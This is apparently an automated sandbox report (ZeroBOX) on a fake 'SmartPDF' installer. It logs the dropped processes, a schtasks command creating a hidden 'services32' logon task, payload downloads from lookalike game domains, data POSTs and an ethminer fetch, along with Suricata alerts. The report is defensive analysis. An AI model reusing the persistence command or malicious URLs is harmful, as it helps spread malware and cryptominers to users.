Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	Sept. 7, 2021, 11:56 a.m.	Sept. 7, 2021, 11:59 a.m.

Size	542.7KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`5578b9ee762d52576c11b01f004fc6ad`
SHA256	`aa3c8a767a538de40293e531aba50c4cfa189510927a22d028f3e34f2997bf95`
CRC32	`3E091371`
ssdeep	`12288:pANwRo+mv8QD4+0V168/Dfgl5RdcLIkpbmWLaTXemh7YlMYV61:pAT8QE+kFgl5/cn6SmhkrVM`
Yara	PE_Header_Zero - PE File Signature UPX_Zero - UPX packed file Malicious_Library_Zero - Malicious_Library IsPE32 - (no description)

SmartPDF.exe "C:\Users\test22\AppData\Local\Temp\SmartPDF.exe"
1608
- Setup.exe "C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe"
  1164
  - gdgame.exe "C:\Users\test22\AppData\Local\Temp\gdgame.exe"
    776
    - gdgame.exe "C:\Users\test22\AppData\Local\Temp\gdgame.exe" -a
      1576
  - installer.exe "C:\Users\test22\AppData\Local\Temp\installer.exe" /qn CAMPAIGN="710"
    1928
    - msiexec.exe "C:\Windows\system32\msiexec.exe" /i "C:\Users\test22\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH=C:\Users\test22\AppData\Local\Temp\installer.exe SETUPEXEDIR=C:\Users\test22\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1630982808 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
      2956
- stats.exe "C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe" /Verysilent
  2344
  - stats.tmp "C:\Users\test22\AppData\Local\Temp\is-RDMLJ.tmp\stats.tmp" /SL5="$7037C,138429,56832,C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe" /Verysilent
    2176
    - Setup.exe "C:\Users\test22\AppData\Local\Temp\is-CHG20.tmp\Setup.exe" /Verysilent
      2920
      - cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\test22\services32.exe"' & exit
        2040
        
        schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\test22\services32.exe"'
        2084
      - services32.exe "C:\Users\test22\services32.exe"
        2540
        
        cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\test22\services32.exe"' & exit
        2252
        
        schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\test22\services32.exe"'
        1200
explorer.exe C:\Windows\Explorer.EXE
1236
rundll32.exe rUNdlL32.eXe "C:\Users\test22\AppData\Local\Temp\axhub.dll",main
2480
- rundll32.exe rUNdlL32.eXe "C:\Users\test22\AppData\Local\Temp\axhub.dll",main
  1984

Name	Response	Post-Analysis Lookup
iplogger.com	A 88.99.66.31	88.99.66.31
ipqualityscore.com	A 104.26.2.60 A 172.67.72.12 A 104.26.3.60	104.26.3.60
google.vrthcobj.com		34.97.69.225
d.dirdgame.live	A 172.67.186.79 A 104.21.59.252	172.67.186.79
bitbucket.org	A 104.192.141.1	104.192.141.1
collect.installeranalytics.com	A 3.232.36.43 A 3.209.18.1	3.232.36.43
ipinfo.io	A 34.117.59.81	34.117.59.81
crl.identrust.com	CNAME identrust.edgesuite.net CNAME a1952.dscq.akamai.net A 23.67.53.58 A 23.67.53.11	23.67.53.58
jom.diregame.live	A 104.21.65.45 A 172.67.158.82	172.67.158.82
sanctam.net	A 185.65.135.234	185.65.135.234
google.vrthcobj.com	A 34.97.69.225	34.97.69.225
iplis.ru	A 88.99.66.31	88.99.66.31
b.upstloans.net	A 104.21.31.210 A 172.67.179.248	172.67.179.248
www.svanaturals.com	CNAME svanaturals.com A 72.167.225.156	72.167.225.156
a.upstloans.net	A 172.67.179.248 A 104.21.31.210	104.21.31.210
2551889d-a2db-4908-a9a2-6b0fab0a7a78.s3.eu-west-2.amazonaws.com	A 52.95.148.158 CNAME s3-r-w.eu-west-2.amazonaws.com	52.95.149.146
ip-api.com	A 208.95.112.1	208.95.112.1
source7.boys4dayz.com	A 172.67.148.61 A 104.21.33.188	172.67.148.61

IP Address	Status	Action
104.21.31.210	Active	Moloch
172.67.148.61	Active	Moloch
172.67.179.248	Active	Moloch
104.192.141.1	Active	Moloch
104.21.65.45	Active	Moloch
104.26.3.60	Active	Moloch
117.18.232.200	Active	Moloch
164.124.101.2	Active	Moloch
172.67.186.79	Active	Moloch
185.65.135.234	Active	Moloch
208.95.112.1	Active	Moloch
23.67.53.58	Active	Moloch
3.232.36.43	Active	Moloch
34.117.59.81	Active	Moloch
34.97.69.225	Active	Moloch
52.95.148.158	Active	Moloch
72.167.225.156	Active	Moloch
88.99.66.31	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.102:49171 -> 88.99.66.31:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49180 -> 88.99.66.31:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49174 -> 34.117.59.81:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.102:49174 -> 34.117.59.81:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 34.117.59.81:443 -> 192.168.56.102:49174	2025330	ET POLICY Possible External IP Lookup SSL Cert Observed (ipinfo.io)	Device Retrieving External IP Address Detected
TCP 192.168.56.102:49192 -> 172.67.148.61:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49176 -> 104.26.3.60:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49184 -> 104.21.65.45:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 52.95.148.158:80 -> 192.168.56.102:49178	2013414	ET POLICY Executable served from Amazon S3	Potentially Bad Traffic
TCP 52.95.148.158:80 -> 192.168.56.102:49178	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 192.168.56.102:49173 -> 34.117.59.81:80	2020716	ET POLICY Possible External IP Lookup ipinfo.io	Device Retrieving External IP Address Detected
TCP 192.168.56.102:49170 -> 88.99.66.31:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49173 -> 34.117.59.81:80	2020716	ET POLICY Possible External IP Lookup ipinfo.io	Device Retrieving External IP Address Detected
TCP 192.168.56.102:49173 -> 34.117.59.81:80	2020716	ET POLICY Possible External IP Lookup ipinfo.io	Device Retrieving External IP Address Detected
TCP 192.168.56.102:49187 -> 172.67.186.79:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49182 -> 72.167.225.156:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 117.18.232.200:443 -> 192.168.56.102:49205	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.102:49206 -> 117.18.232.200:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49204 -> 117.18.232.200:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49203 -> 117.18.232.200:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 117.18.232.200:443 -> 192.168.56.102:49208	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.102:49226 -> 3.232.36.43:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49232 -> 3.232.36.43:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49210 -> 208.95.112.1:80	2022082	ET POLICY External IP Lookup ip-api.com	Device Retrieving External IP Address Detected
TCP 192.168.56.102:49248 -> 3.232.36.43:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49202 -> 117.18.232.200:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49210 -> 208.95.112.1:80	2022082	ET POLICY External IP Lookup ip-api.com	Device Retrieving External IP Address Detected
TCP 192.168.56.102:49210 -> 208.95.112.1:80	2022082	ET POLICY External IP Lookup ip-api.com	Device Retrieving External IP Address Detected
TCP 192.168.56.102:49222 -> 3.232.36.43:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49221 -> 3.232.36.43:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49224 -> 3.232.36.43:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49210 -> 208.95.112.1:80	2022082	ET POLICY External IP Lookup ip-api.com	Device Retrieving External IP Address Detected
TCP 192.168.56.102:49228 -> 3.232.36.43:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49223 -> 3.232.36.43:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49238 -> 3.232.36.43:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49225 -> 3.232.36.43:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49239 -> 3.232.36.43:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49233 -> 3.232.36.43:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49242 -> 3.232.36.43:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49234 -> 3.232.36.43:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49237 -> 3.232.36.43:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49245 -> 3.232.36.43:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49227 -> 185.65.135.234:58899	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49229 -> 3.232.36.43:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49230 -> 3.232.36.43:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49231 -> 3.232.36.43:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49235 -> 3.232.36.43:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49236 -> 3.232.36.43:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49219 -> 3.232.36.43:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49244 -> 104.192.141.1:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49240 -> 3.232.36.43:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49241 -> 3.232.36.43:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49243 -> 3.232.36.43:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49247 -> 3.232.36.43:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49246 -> 3.232.36.43:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.102:49171 88.99.66.31:443	C=US, O=Let's Encrypt, CN=R3	CN=iplogger.com	01:03:e9:82:3a:f4:6d:5a:7f:e9:29:26:08:3c:f4:61:a7:b2:88:bb
TLSv1 192.168.56.102:49180 88.99.66.31:443	C=US, O=Let's Encrypt, CN=R3	CN=iplogger.com	01:03:e9:82:3a:f4:6d:5a:7f:e9:29:26:08:3c:f4:61:a7:b2:88:bb
TLSv1 192.168.56.102:49174 34.117.59.81:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1D4	CN=ipinfo.io	9b:8a:7e:73:93:70:47:e8:1f:ef:b1:b9:f4:52:8b:2f:90:2c:85:2e
TLSv1 192.168.56.102:49192 172.67.148.61:443	C=US, O=Let's Encrypt, CN=R3	CN=*.boys4dayz.com	63:06:25:8c:e0:e5:22:17:08:5c:57:74:d1:bf:13:5d:b5:e9:a1:fb
TLSv1 192.168.56.102:49176 104.26.3.60:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	f5:72:da:40:bf:be:27:7c:72:0c:5c:e2:dd:f4:22:7a:4d:b1:41:14
TLSv1 192.168.56.102:49184 104.21.65.45:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	4d:09:7a:e7:f4:eb:aa:0d:0f:42:0e:b4:5e:97:1b:e4:c3:c3:87:e8
TLSv1 192.168.56.102:49170 88.99.66.31:443	C=US, O=Let's Encrypt, CN=R3	CN=iplogger.com	01:03:e9:82:3a:f4:6d:5a:7f:e9:29:26:08:3c:f4:61:a7:b2:88:bb
TLSv1 192.168.56.102:49187 172.67.186.79:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	03:d2:a2:92:7c:46:a9:cd:c3:c5:28:a5:f9:58:f1:b1:21:82:30:fa
TLSv1 192.168.56.102:49211 172.67.179.248:443	C=US, O=Let's Encrypt, CN=R3	CN=*.upstloans.net	12:ed:3c:4a:ff:c2:a1:8d:83:7a:48:18:92:32:52:dc:a3:6f:83:f7
TLSv1 192.168.56.102:49226 3.232.36.43:443	None	None	None
TLSv1 192.168.56.102:49232 3.232.36.43:443	None	None	None
TLSv1 192.168.56.102:49248 3.232.36.43:443	None	None	None
TLSv1 192.168.56.102:49221 3.232.36.43:443	None	None	None
TLSv1 192.168.56.102:49222 3.232.36.43:443	None	None	None
TLSv1 192.168.56.102:49216 104.21.31.210:443	C=US, O=Let's Encrypt, CN=R3	CN=*.upstloans.net	12:ed:3c:4a:ff:c2:a1:8d:83:7a:48:18:92:32:52:dc:a3:6f:83:f7
TLSv1 192.168.56.102:49224 3.232.36.43:443	None	None	None
TLSv1 192.168.56.102:49218 172.67.179.248:443	None	None	None
TLSv1 192.168.56.102:49228 3.232.36.43:443	None	None	None
TLSv1 192.168.56.102:49223 3.232.36.43:443	None	None	None
TLSv1 192.168.56.102:49238 3.232.36.43:443	None	None	None
TLSv1 192.168.56.102:49225 3.232.36.43:443	None	None	None
TLSv1 192.168.56.102:49239 3.232.36.43:443	None	None	None
TLSv1 192.168.56.102:49233 3.232.36.43:443	None	None	None
TLSv1 192.168.56.102:49242 3.232.36.43:443	None	None	None
TLSv1 192.168.56.102:49234 3.232.36.43:443	None	None	None
TLSv1 192.168.56.102:49237 3.232.36.43:443	None	None	None
TLSv1 192.168.56.102:49245 3.232.36.43:443	None	None	None
TLS 1.2 192.168.56.102:49227 185.65.135.234:58899	C=US, O=Let's Encrypt, CN=R3	CN=sanctam.net	38:bc:f2:94:62:8a:02:9e:90:64:d5:0f:bc:00:83:12:36:86:2c:2a
TLSv1 192.168.56.102:49229 3.232.36.43:443	None	None	None
TLSv1 192.168.56.102:49230 3.232.36.43:443	None	None	None
TLSv1 192.168.56.102:49231 3.232.36.43:443	None	None	None
TLSv1 192.168.56.102:49235 3.232.36.43:443	None	None	None
TLSv1 192.168.56.102:49236 3.232.36.43:443	None	None	None
TLSv1 192.168.56.102:49220 172.67.179.248:443	None	None	None
TLS 1.2 192.168.56.102:49244 104.192.141.1:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 Extended Validation Server CA	unknown=Private Organization, unknown=US, unknown=Delaware, serialNumber=3928449, C=US, ST=California, L=San Francisco, O=Atlassian, Inc., OU=Bitbucket, CN=bitbucket.org	4e:6a:4c:3b:82:15:ef:df:97:38:5e:50:ef:b9:86:42:84:3b:89:f0
TLSv1 192.168.56.102:49219 3.232.36.43:443	C=US, O=Amazon, OU=Server CA 1B, CN=Amazon	CN=installeranalytics.com	46:bc:d9:e4:bb:04:00:59:99:29:4c:3b:84:9e:82:d6:3c:62:8d:2b
TLSv1 192.168.56.102:49240 3.232.36.43:443	None	None	None
TLSv1 192.168.56.102:49241 3.232.36.43:443	None	None	None
TLSv1 192.168.56.102:49243 3.232.36.43:443	None	None	None
TLSv1 192.168.56.102:49247 3.232.36.43:443	None	None	None
TLSv1 192.168.56.102:49246 3.232.36.43:443	None	None	None

Queries for the computername (7 events)

Time & API	Arguments	Status	Return
GetComputerNameW Sept. 7, 2021, 11:48 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 7, 2021, 11:48 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 7, 2021, 11:49 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 7, 2021, 11:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 7, 2021, 11:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 7, 2021, 11:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 7, 2021, 11:57 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (9 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Sept. 7, 2021, 11:56 a.m.			0	0
IsDebuggerPresent Sept. 7, 2021, 11:48 a.m.			0	0
IsDebuggerPresent Sept. 7, 2021, 11:48 a.m.			0	0
IsDebuggerPresent Sept. 7, 2021, 11:56 a.m.			0	0
IsDebuggerPresent Sept. 7, 2021, 11:49 a.m.			0	0
IsDebuggerPresent Sept. 7, 2021, 11:49 a.m.			0	0
IsDebuggerPresent Sept. 7, 2021, 11:57 a.m.			0	0
IsDebuggerPresent Sept. 7, 2021, 11:57 a.m.			0	0
IsDebuggerPresent Sept. 7, 2021, 11:57 a.m.			0	0

Command line console output was observed (2 events)

Time & API	Arguments	Status	Return	Repeated
WriteConsoleW Sept. 7, 2021, 11:49 a.m.	buffer: SUCCESS: The scheduled task "services32" has successfully been created. console_handle: 0x0000000000000007	1	1	0
WriteConsoleW Sept. 7, 2021, 11:57 a.m.	buffer: SUCCESS: The scheduled task "services32" has successfully been created. console_handle: 0x0000000000000007	1	1	0

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Tries to locate where the browsers are installed (1 event)

file	c:\program files (x86)\Google\Chrome\application\chrome.exe

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Sept. 7, 2021, 11:56 a.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (3 events)

section	CODE
section	DATA
section	BSS

The executable uses a known packer (1 event)

packer

BobSoft Mini Delphi -> BoB / BobSoft

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (8 events)

suspicious_features	HTTP version 1.0 used	suspicious_request	HEAD http://2551889d-a2db-4908-a9a2-6b0fab0a7a78.s3.eu-west-2.amazonaws.com/SmartPDF/SmartPDF.exe
suspicious_features	HTTP version 1.0 used	suspicious_request	GET http://2551889d-a2db-4908-a9a2-6b0fab0a7a78.s3.eu-west-2.amazonaws.com/SmartPDF/SmartPDF.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET https://jom.diregame.live/userf/2203/gdgame.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET https://d.dirdgame.live/userf/2203/3cc0e0be954dc849581f9ff1817647de.exe
suspicious_features	POST method with no referer header	suspicious_request	POST https://a.upstloans.net/report7.4.php
suspicious_features	POST method with no referer header	suspicious_request	POST https://b.upstloans.net/report7.4.php
suspicious_features	POST method with no referer header	suspicious_request	POST https://collect.installeranalytics.com/
suspicious_features	GET method with no useragent header	suspicious_request	GET https://bitbucket.org/Sanctam/sanctam/raw/6886fdce0f0a2bb81eece107d8acbd20b349ca2f/includes/ethminer

Performs some HTTP requests (18 events)

request	GET http://ipinfo.io/country
request	GET http://ipinfo.io/ip
request	HEAD http://2551889d-a2db-4908-a9a2-6b0fab0a7a78.s3.eu-west-2.amazonaws.com/SmartPDF/SmartPDF.exe
request	GET http://2551889d-a2db-4908-a9a2-6b0fab0a7a78.s3.eu-west-2.amazonaws.com/SmartPDF/SmartPDF.exe
request	GET http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml
request	GET http://ip-api.com/json/?fields=8198
request	GET http://crl.identrust.com/DSTROOTCAX3CRL.crl
request	GET https://iplis.ru/1S2Qs7
request	GET https://iplis.ru/favicon.ico
request	GET https://ipinfo.io/country
request	GET https://ipqualityscore.com/api/json/ip/gp65l99h87k3l1g0owh8fr8v99dme/175.208.134.150
request	GET https://iplogger.com/1ESxy7
request	GET https://jom.diregame.live/userf/2203/gdgame.exe
request	GET https://d.dirdgame.live/userf/2203/3cc0e0be954dc849581f9ff1817647de.exe
request	POST https://a.upstloans.net/report7.4.php
request	POST https://b.upstloans.net/report7.4.php
request	POST https://collect.installeranalytics.com/
request	GET https://bitbucket.org/Sanctam/sanctam/raw/6886fdce0f0a2bb81eece107d8acbd20b349ca2f/includes/ethminer

Sends data using the HTTP POST Method (3 events)

request	POST https://a.upstloans.net/report7.4.php
request	POST https://b.upstloans.net/report7.4.php
request	POST https://collect.installeranalytics.com/

Allocates read-write-execute memory (usually to unpack itself) (50 out of 221 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Sept. 7, 2021, 11:56 a.m.	process_identifier: 1608 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x737d2000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 7, 2021, 11:56 a.m.	process_identifier: 1608 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x733c3000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 7, 2021, 11:56 a.m.	process_identifier: 1608 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04470000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 7, 2021, 11:48 a.m.	process_identifier: 1164 region_size: 1048576 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000750000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 7, 2021, 11:48 a.m.	process_identifier: 1164 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000007d0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 7, 2021, 11:48 a.m.	process_identifier: 1164 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1431000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 7, 2021, 11:48 a.m.	process_identifier: 1164 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1acb000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 7, 2021, 11:48 a.m.	process_identifier: 1164 region_size: 1835008 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000d60000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 7, 2021, 11:48 a.m.	process_identifier: 1164 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000ea0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 7, 2021, 11:48 a.m.	process_identifier: 1164 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1432000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 7, 2021, 11:48 a.m.	process_identifier: 1164 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1432000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 7, 2021, 11:48 a.m.	process_identifier: 1164 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1432000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 7, 2021, 11:48 a.m.	process_identifier: 1164 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1432000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 7, 2021, 11:48 a.m.	process_identifier: 1164 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1432000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 7, 2021, 11:48 a.m.	process_identifier: 1164 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1432000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 7, 2021, 11:48 a.m.	process_identifier: 1164 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1432000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 7, 2021, 11:48 a.m.	process_identifier: 1164 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1432000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 7, 2021, 11:48 a.m.	process_identifier: 1164 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1432000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 7, 2021, 11:48 a.m.	process_identifier: 1164 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1432000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 7, 2021, 11:48 a.m.	process_identifier: 1164 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1432000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 7, 2021, 11:48 a.m.	process_identifier: 1164 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1434000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 7, 2021, 11:48 a.m.	process_identifier: 1164 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1434000 process_handle: 0xffffffffffffffff	1
